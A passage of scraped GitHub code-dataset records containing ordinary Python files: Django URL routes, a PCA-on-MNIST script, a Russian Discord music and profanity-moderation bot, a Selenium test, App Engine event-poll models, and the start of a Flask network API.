"usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "40906088608", "text": "from django.urls import path\nfrom django.urls import include\n\nfrom rest_auth.registration import views as registration_views\nfrom rest_auth import views as auth_views\n\nfrom . import views\n\nurlpatterns = [\n\n # User\n path('/', include([\n path(\n 'follow/',\n views.FollowViewSet.as_view({\n 'post': 'create',\n 'get': 'list'\n }),\n name='follow'\n ),\n path('unfollow/', views.FollowViewSet.as_view({'delete': 'destroy'}), name='unfollow'),\n path('', views.UserViewSet.as_view({'get': 'retrieve'}), name='profile'),\n ])),\n\n path('me/', views.UserViewSet.as_view({'get': 'retrieve_me'}), name='profile'),\n\n # Login\n path('login/', auth_views.LoginView.as_view(), name='login'),\n\n # Registration\n path('', registration_views.RegisterView.as_view(), name='registration'),\n\n]\n", "repo_name": "hwshim0810/restapi-example-Django", "sub_path": "apps/users/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_auth.views.LoginView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_auth.views.LoginView", "line_number": 28, "usage_type": "attribute"}, {"api_name": "rest_auth.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_auth.registration.views.RegisterView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_auth.registration.views.RegisterView", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_auth.registration.views", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "39342999364", "text": "# x를 4차원에서 2차원으로 변형, Dense 모델에 넣어주기\n# keras 56_mnist_DNN.py 복붙\n\nimport numpy as np\n\n\n#1. 데이터\nfrom tensorflow.keras.datasets import mnist\n\nmnist.load_data()\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nprint(x_train.shape) # (60000, 28, 28)\nprint(x_test.shape) # (10000, )\nprint(y_train.shape) # (60000, )\nprint(y_test.shape) # (10000, )\n\n\n# x_data전처리 : MinMaxScaler\nx_train = x_train.astype('float32')/255\nx_test = x_test.astype('float32')/255\n\n\n# # y_data 전처리 : one_hot_encoding (다중 분류)\n# from keras.utils.np_utils import to_categorical\n# y_trian = to_categorical(y_train)\n# y_test = to_categorical(y_test)\n# print(y_train.shape)\n\n\n# reshape : Dense형 모델 사용을 위한 '2차원'\nx_train = x_train.reshape(60000, 784 ).astype('float32')/255 \nx_test = x_test.reshape(10000, 784).astype('float32')/255 \n\nprint(x_train.shape) # (60000, 784)\nprint(x_test.shape) # (10000, 784)\n\n\nX = np.append(x_train, x_test, axis = 0)\n\nprint(X.shape) # (70000, 784)\n\nfrom sklearn.decomposition import PCA\n\npca = PCA()\npca.fit(X)\n\ncumsum = np.cumsum(pca.explained_variance_ratio_)\n\nprint(cumsum)\n\n# best_n_components = np.argmax(cumsum >= 0.99) +1 # 331\nbest_n_components = np.argmax(cumsum >= 0.95) +1 # 154\n\nprint(best_n_components) \n\n\n", "repo_name": "elf0508/Study-bit", "sub_path": "AE/a04_pca_mnist.py", "file_name": "a04_pca_mnist.py", "file_ext": "py", "file_size_in_byte": 1493, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.mnist", "line_number": 10, "usage_type": "name"}, {"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.mnist", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "11970040968", "text": "import asyncio\nimport nacl\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport discord\nimport youtube_dl\nfrom discord.ext import commands\nimport os\n\nbot = commands.Bot(command_prefix=commands.when_mentioned_or(\"!\"))\nnext_music = []\nban = {}\nflag = True\n\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n\n@bot.event\nasync def on_message(message):\n global ban, flag\n list = ['бля', 'блять', 'сука', 'нахуй', \"на хуй\", \"пизда\", \"ебал\", \"ебать\", \"на xуй\", \"на хyй\", \"на xyй\", \"нa хуй\",\n \"нa xуй\", \"нa хyй\", \"нa xyй\", 'cука', 'сyка', 'сукa', 'cyка', 'cукa', 'cyкa', 'сyкa', \"бздун\", 'бзднуть',\n 'бздюх','блудилище','выпердеть','высраться','выссаться','говно','говенка','говноед','говномес','говночист',\n 'говяга','говнюк','говняный','говна пирога','глиномес','изговнять','гнида','гнидас','гнидазавр',\n 'гниданидзе','гондон','гондольер','даун','даунитто','дерьмо','дерьмодемон','дерьмище','дрисня','дрист',\n 'дристануть','обдристаться','дерьмак','дристун','дрочить','дрочила','суходрочер','дебил','дебилоид',\n 'дрочка','драчун','задрот','дцпшник','елда','елдаклык','елдище','жопа','жопошник','залупа','залупиться',\n 'залупинец','засеря','засранец','засрать','защеканец','изговнять','идиот','изосрать','курва','кретин',\n 'кретиноид','курвырь','лезбуха','лох','минетчица','мокрощелка','мудак','мудень','мудила','мудозвон',\n 'мудацкая','мудасраная дерьмопроелдина','мусор','педрик','пердеж','пердение','пердельник','пердун',\n 'пидор','пидорасина','пидорормитна','пидорюга','педерастер','педобратва','дружки педигрипал','писька',\n 'писюн','спидозный пес','ссаная псина','спидораковый','срать','спермер','спермобак','спермодун','срака',\n 'сракаборец','сракалюб','срун','сучара','сучище','титьки','трипер','хер','херня','херовина','хероед',\n 'охереть','пошел на хер','хитрожопый','хрен моржовый','шлюха','шлюшидзе']\n\n if message.author == bot.user:\n return\n\n if flag == True:\n for i in list:\n if i in message.content.lower() and message.author not in ban:\n await message.delete()\n ban[message.author] = 1\n await message.channel.send(f'❌ Ай ай ай {message.author}! А здесь материться нельзя! Это пока {ban[message.author]} случай. На третий раз ЗАБАНЮ!')\n break\n\n if i in message.content.lower() and ban[message.author] < 2:\n await message.delete()\n ban[message.author] += 1\n await message.channel.send(f'❌ Ай ай ай {message.author}! А здесь материться нельзя! Это пока {ban[message.author]} случай. На третий раз ЗАБАНЮ!')\n break\n\n if i in message.content.lower() and ban[message.author] == 2:\n await message.delete()\n await message.author.ban(reason='Нецензурное выражение.')\n await message.channel.send(f'БАН {message.author}! Причина: нецензурное выражение.')\n del ban[message.author]\n break\n\n if flag == False:\n pass\n\n await bot.process_commands(message)\n\n@bot.command()\nasync def status(ctx):\n global ban\n if ctx.message.author not in ban:\n await ctx.send('У вас нет предупреждений. Вы очень галантный и вежливый пользователь. Продолжайте в том-же духе! ☺')\n else:\n await ctx.send(f'{ctx.message.author}, у вас на счету {ban[ctx.message.author]} предупреждения. Будет 3 и вас забанят, так что будьте аккуратны в выражениях.')\n\n@bot.command()\nasync def clear(ctx, limit=None):\n if limit == None and ctx.message.author.guild_permissions.manage_messages == True:\n await ctx.channel.purge()\n\n if limit != None and ctx.message.author.guild_permissions.manage_messages == True:\n await ctx.channel.purge(limit=int(limit)+1)\n\n if ctx.message.author.guild_permissions.manage_messages == False:\n await ctx.send('❌ У вас нет такого права.')\n\n@bot.command()\nasync def pause(ctx: commands.Context):\n ctx.voice_client.pause()\n await ctx.send('⏹ Для того чтобы продолжить напишите !resume')\n\n@bot.command()\nasync def resume(ctx: commands.Context):\n ctx.voice_client.resume()\n await ctx.send('⏯ Для того чтобы поставить на паузу напишите !pause')\n\n@bot.command()\nasync def stop(ctx: commands.Context):\n global next_music\n next_music.clear()\n await ctx.voice_client.disconnect()\n\n@bot.command()\nasync def list(ctx):\n global next_music\n if len(next_music) == 0:\n await ctx.send('❌ Сейчас список музыки пуст.')\n for i in range(0, len(next_music)):\n await ctx.send(f'{i+1} - {next_music[i]}')\n\n@bot.command()\nasync def add(ctx, *, name_music):\n global next_music\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36\"\n }\n\n req = requests.get(f\"https://www.youtube.com/results?search_query={name_music}\", headers=headers)\n soup = BeautifulSoup(req.text, \"html.parser\")\n n = re.search(r'\"videoId\":\"(\\w+)\"', str(soup.find('body').find_all('script')[13].text)).group()[11:-1]\n next_music.append(f'https://www.youtube.com/watch?v={n}')\n await ctx.send('✅ Музыка успешно добавлена.')\n\n@bot.command()\nasync def skip(ctx):\n global next_music\n\n if len(next_music) == 0:\n await ctx.send('❌ Сейчас в списке нет следующих компазиций.')\n\n else:\n if not ctx.author.voice or not ctx.author.voice.channel:\n await ctx.send('❌ Сначала подключись к голосовому.')\n else:\n try:\n await ctx.voice_client.disconnect()\n except:\n pass\n await ctx.send('⏭')\n await ctx.message.author.voice.channel.connect(reconnect=True)\n video = next_music.pop(0)\n YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist': 'True'}\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',\n 'options': '-vn'}\n voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)\n print(voice)\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(video, download=False)\n URL = info['formats'][0]['url']\n try:\n os.chdir(r'ffmpeg\\bin')\n except:\n pass\n voice.play(discord.player.FFmpegPCMAudio(executable=fr\"{os.getcwd()}\\ffmpeg.exe\", source=URL,\n **FFMPEG_OPTIONS))\n voice.is_playing()\n await ctx.send(f\"✅ Сейчас играет: {video}\")\n\n@bot.command()\nasync def play(ctx, *, name_song):\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36\"\n }\n\n req = requests.get(f\"https://www.youtube.com/results?search_query={name_song}\", headers=headers)\n soup = BeautifulSoup(req.text, \"html.parser\")\n n = re.search(r'\"videoId\":\"(\\w+)\"', str(soup.find('body').find_all('script')[13].text)).group()[11:-1]\n video = f'https://www.youtube.com/watch?v={n}'\n try:\n if not ctx.author.voice or not ctx.author.voice.channel:\n await ctx.send('❌ Сначала подключись к голосовому.')\n\n else:\n await ctx.message.author.voice.channel.connect(reconnect=True)\n YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist': 'True'}\n FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\n voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)\n print(voice)\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(video, download=False)\n URL = info['formats'][0]['url']\n try:\n os.chdir(r'ffmpeg\\bin')\n except:\n pass\n voice.play(discord.player.FFmpegPCMAudio(executable=fr\"{os.getcwd()}\\ffmpeg.exe\", source=URL, **FFMPEG_OPTIONS))\n voice.is_playing()\n await ctx.send(f\"✅ Сейчас играет: {video}\")\n except discord.errors.ClientException:\n await ctx.send(\"❌ Музыка уже играет. Если хотите добавить в очередь, напишите - !add 'название музыки'\")\n\n@bot.command()\nasync def antimat(ctx):\n global flag, ban\n count = 0\n\n if flag == False and ctx.message.author.guild_permissions.administrator == True and count == 0:\n flag = True\n count += 1\n await ctx.send(f'Пользователь {ctx.message.author} ВКЛЮЧИЛ контроль за сквернословн��ми. Теперь чат под строгим надзором!')\n\n if flag == True and ctx.message.author.guild_permissions.administrator == True and count == 0:\n flag = False\n ban = {}\n count += 1\n await ctx.send(f'Пользователь {ctx.message.author} ОТКЛЮЧИЛ контроль за сквернословными. Теперь в чатах можно материться.')\n\n if ctx.message.author.guild_permissions.administrator == False:\n await ctx.send('❌ У вас нет такого права.')\n\n@bot.command()\nasync def menu(ctx):\n await ctx.send(\"☺ Привет! Я test-bot. Вот список моих команд:\\n\"\n \"> • !clear <число (необязательно)> - отчистка всего чата или нескольких сообщений. ⚠ Только АДМИНИСТРАТОРАМ и МОДЕРАТОРАМ сервера!\\n\"\n \"> • !play <название музыки> - включает музыку с YouTube.\\n\"\n \"> • !antimat - ОТКЛЮЧАЕТ или ВКЛЮЧАЕТ контроль за нецензурные выражения. ⚠ Только АДМИНИСТРАТОРАМ сервера!\\n\"\n \"> • !pause - ставит музыку на паузу.\\n\"\n \"> • !resume - воспраизводит музыку с момента паузы.\\n\"\n \"> • !stop - останавливает музыку.\\n\"\n \"> • !add - добавить музыку в очередь.\\n\"\n \"> • !skip - пропустить текущую музыку.\\n\"\n \"> • !list - показывает список следующих копазиций.\")\n\nbot.run('Your token')", "repo_name": "Rikitick/Bot-DISCORD", "sub_path": "Bot_DISCORD/main_bot/bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 12529, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 11, "usage_type": "name"}, {"api_name": "discord.ext.commands.when_mentioned_or", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands.Context", "line_number": 87, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 87, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 92, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 92, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 97, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 97, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 119, "usage_type": "call"}, {"api_name": "re.search", "line_number": 120, "usage_type": "call"}, {"api_name": "discord.utils.get", "line_number": 145, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 145, "usage_type": "attribute"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 147, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 151, "usage_type": "call"}, {"api_name": "discord.player.FFmpegPCMAudio", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.player", "line_number": 154, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 154, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 166, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 167, "usage_type": "call"}, {"api_name": "re.search", "line_number": 168, "usage_type": "call"}, {"api_name": "discord.utils.get", "line_number": 178, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 178, "usage_type": "attribute"}, {"api_name": "youtube_dl.YoutubeDL", "line_number": 180, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 184, "usage_type": "call"}, {"api_name": "discord.player.FFmpegPCMAudio", "line_number": 187, "usage_type": "call"}, {"api_name": "discord.player", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 187, "usage_type": "call"}, {"api_name": "discord.errors", "line_number": 190, "usage_type": "attribute"}]} +{"seq_id": "31237841164", "text": "from pyvirtualdisplay import Display\nfrom selenium import webdriver\n\ndisplay = Display(visible=0, size=(800, 600))\ndisplay.start()\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--no-sandbox')\n\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.get('http://nytimes.com')\nprint(driver.title)\n\n\n\n\n\n\n\n\n\n# from selenium import webdriver\n# driver = webdriver.Firefox(executable_path='/usr/bin/geckodriver')\n# driver.get(\"http://google.com\")\n# driver.implicitly_wait(15)\n# driver.get_screenshot_as_file(\"c10.png\")\n", "repo_name": "saurabh9567/aadhaar", "sub_path": "test3.py", "file_name": "test3.py", "file_ext": "py", "file_size_in_byte": 526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pyvirtualdisplay.Display", "line_number": 4, "usage_type": "call"}, {"api_name": "selenium.webdriver.ChromeOptions", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 7, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "15634445132", "text": "from django.shortcuts import render\nfrom .models import kontenmentee\n# Create your views here.\n\n\ndef mentee(request):\n dbmentee = kontenmentee.objects.all()\n data = {\n 'halamanhome': '/',\n 'halamanblog': '/blog',\n 'halamanmentor': '/mentor',\n 'halamanmentee': '/mentee',\n 'halamanauthor': '/author',\n 'kontenmentees' : dbmentee\n }\n return render(request, 'mentee.html', data)\n", "repo_name": "faviansya/DJANGO_MVC", "sub_path": "project_advance_views/mentee/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.kontenmentee.objects.all", "line_number": 7, "usage_type": "call"}, {"api_name": "models.kontenmentee.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "models.kontenmentee", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "72325368764", "text": "from factory.rotated_factory import RotatedEllipsoidFactory\nfrom factory.dixon_factory import DixonFactory\nfrom controllers.ag import Ag\n\nMAX_INDIVIDUALS = 40\nELITE = 8\nGENERATIONS = 2000\n\nag = Ag()\n\nprint(\"ROTATED HYPER-ELLIPSOID FUNCTION\")\nag.execute( nGen=GENERATIONS,\n nInd=MAX_INDIVIDUALS,\n elitism=ELITE,\n maximization=False,\n interval=(-65.536, 65.536),\n dimension=2,\n factory=RotatedEllipsoidFactory.factory )\n\nprint(\"DIXON-PRICE FUNCTION\")\nag.execute( nGen=GENERATIONS,\n nInd=MAX_INDIVIDUALS,\n elitism=ELITE,\n maximization=False,\n interval=(-10, 10),\n dimension=2,\n factory=DixonFactory.factory )\n\n\n\n\n\n\n\n\n", "repo_name": "arthurzatta/genetic-algorithms", "sub_path": "surjano/src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "controllers.ag.Ag", "line_number": 9, "usage_type": "call"}, {"api_name": "factory.rotated_factory.RotatedEllipsoidFactory.factory", "line_number": 18, "usage_type": "attribute"}, {"api_name": "factory.rotated_factory.RotatedEllipsoidFactory", "line_number": 18, "usage_type": "name"}, {"api_name": "factory.dixon_factory.DixonFactory.factory", "line_number": 27, "usage_type": "attribute"}, {"api_name": "factory.dixon_factory.DixonFactory", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "5763907004", "text": "import datetime\nfrom google.appengine.ext import ndb\n\nclass User(ndb.Model):\n\tname = ndb.StringProperty(required=True)\n\tfb_id = ndb.StringProperty(required=True)\n\timg_url = ndb.StringProperty(required=True)\n\nclass Selection(ndb.Model):\n\tname = ndb.StringProperty()\n\tpeople = ndb.StructuredProperty(User, repeated=True)\n\nclass Poll(ndb.Model): \n\tname = ndb.StringProperty()\n\tselections = ndb.LocalStructuredProperty(Selection, repeated=True)\n\nclass Event(ndb.Model):\n\tname = ndb.StringProperty(required=True)\n\thost_name = ndb.StringProperty(required=True)\n\thost_fb_id = ndb.StringProperty(required=True)\n\tdescription = ndb.StringProperty()\n\tpicture_url = ndb.StringProperty()\n\tpeople = ndb.StructuredProperty(User, repeated=True)\n\tpolls = ndb.LocalStructuredProperty(Poll, repeated=True)\n\ndef addEvent(event):\n\tevent = Event(\n\t\tname = event[\"name\"],\n\t\thost_name = event[\"host_name\"],\n\t\thost_fb_id = event[\"host_fb_id\"],\n\t\tdescription = event[\"description\"],\n\t\tpicture_url = event[\"picture_url\"],\n\t\tpeople = [User(name = event[\"people\"][0][\"name\"],\n\t\t\t\t\t fb_id = event[\"people\"][0][\"id\"],\n\t\t\t\t\t img_url = event[\"people\"][0][\"img_url\"])],\n\t\tpolls = [Poll(name = \"datetime\", selections = []),\n\t\t\t\t Poll(name = 'location', selections = [])]\n\t);\n\n\tkey = event.put()\n\tkey_string = key.urlsafe()\n\n\treturn key_string\n\ndef editEvent(event, url_key):\n\told_event = ndb.Key(urlsafe=url_key)\n\told_event = old_event.get()\n\n\n\told_event.name = event[\"name\"]\n\told_event.host_name = event[\"host_name\"]\n\told_event.host_fb_id = event[\"host_fb_id\"]\n\told_event.description = event[\"description\"]\n\told_event.picture_url = event[\"picture_url\"]\n\told_event.people = []\n\n\tfor person in event[\"people\"]:\n\t\told_event.people.append(User(name = person[\"name\"],\n\t\t\t\t\t \t\t \t fb_id = person[\"id\"],\n\t\t\t\t\t \t\t \t img_url = person[\"img_url\"]))\n\n\tkey = old_event.put();\n\treturn old_event\n\t\n\ndef getEvent(url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\treturn event.get()\n\ndef addUser(user, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tevent.people.append(User(name = user[\"name\"],\n\t\t\t\t\t\t\t fb_id = user[\"id\"],\n\t\t\t\t\t\t\t img_url = user[\"img_url\"]))\n\tkey = event.put();\n\treturn event\n\n\ndef addSelection(user_selection, user_poll, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tfor poll in event.polls:\n\t\tif poll.name == user_poll:\n\t\t\tduplicate = False\n\t\t\tfor selection in poll.selections:\n\t\t\t\tif selection.name == user_selection:\n\t\t\t\t\tduplicate = True\n\t\t\tif not duplicate:\n\t\t\t\tpoll.selections.append(Selection(name = user_selection,\n\t\t\t\t\t\t\t\t\t\t\t \t people = []))\n\n\tkey = event.put();\n\treturn event\n\ndef addVote(user, user_selection, user_poll, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tfor poll in event.polls:\n\t\tif poll.name == user_poll:\n\t\t\tfor selection in poll.selections:\n\t\t\t\tif selection.name == user_selection:\n\t\t\t\t\tselection.people.append(User(name = user[\"name\"],\n\t\t\t\t\t\t\t \t\t\t\t\t fb_id = user[\"id\"],\n\t\t\t\t\t\t\t \t\t\t\t\t img_url = user[\"img_url\"]))\n\n\tkey = event.put();\n\treturn event\n\ndef removeVote(user, user_selection, user_poll, url_key):\n\tevent = ndb.Key(urlsafe=url_key)\n\tevent = event.get()\n\tfor poll in event.polls:\n\t\tif poll.name == user_poll:\n\t\t\tfor selection in poll.selections:\n\t\t\t\tif selection.name == user_selection:\n\t\t\t\t\tuser_obj = User(name = user[\"name\"],\n\t\t\t\t\t\t\t \t\tfb_id = user[\"id\"],\n\t\t\t\t\t\t\t \t\timg_url = user[\"img_url\"])\n\t\t\t\t\tselection.people.remove(user_obj)\n\n\tkey = event.put();\n\treturn event\n\n", "repo_name": "nearalias/EventBox", "sub_path": "ebModels.py", "file_name": "ebModels.py", "file_ext": "py", "file_size_in_byte": 3445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "google.appengine.ext.ndb.Model", "line_number": 4, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 4, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 5, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 5, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 6, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 6, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 7, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 7, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 9, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 10, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 10, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StructuredProperty", "line_number": 11, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 11, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 13, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 13, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 14, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 14, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.LocalStructuredProperty", "line_number": 15, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 15, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 17, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 17, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 18, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 18, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 19, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 19, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 20, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 20, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 21, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 21, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 22, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 22, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StructuredProperty", "line_number": 23, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 23, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.LocalStructuredProperty", "line_number": 24, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 24, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 46, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 46, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 67, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 67, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 71, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 71, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 81, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 81, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 97, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 97, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 111, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 111, "usage_type": "name"}]} +{"seq_id": "16181604769", "text": "# encoding=utf-8\nimport json\nimport logging\n\nfrom flask import jsonify\nfrom flask_restful import marshal\nfrom sqlalchemy import and_\nimport socket, struct\nfrom IPy import IP\nimport copy\nimport json\nfrom threading import Thread\n\nimport smurf.config as config\nfrom .common import NETWORK_FIELDS\nfrom smurf.api_requests.api_requests import post_http, delete_http, get_http\nfrom smurf.db.models import db_session, Network, VlanIpAddress\nimport smurf.auth as auth\nfrom smurf.utils import exec_cmd, get_token\nfrom smurf.db.openstack_db import NetworkSegments\nfrom smurf.api_requests.switch_config import SwitchConfig\nfrom smurf.api_requests.sdn_switch_config import PyjsonrpcClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass NetworkListAPI(auth.X_resource):\n \"\"\"\n this is Network list plugins\n \"\"\"\n\n def get(self):\n \"\"\"\n method to get Network by user id\n \"\"\"\n if not self.result.get(\"success\"):\n return self.result\n user_id = self.context.get('user_id')\n networks = Network.query.filter(Network.removed == 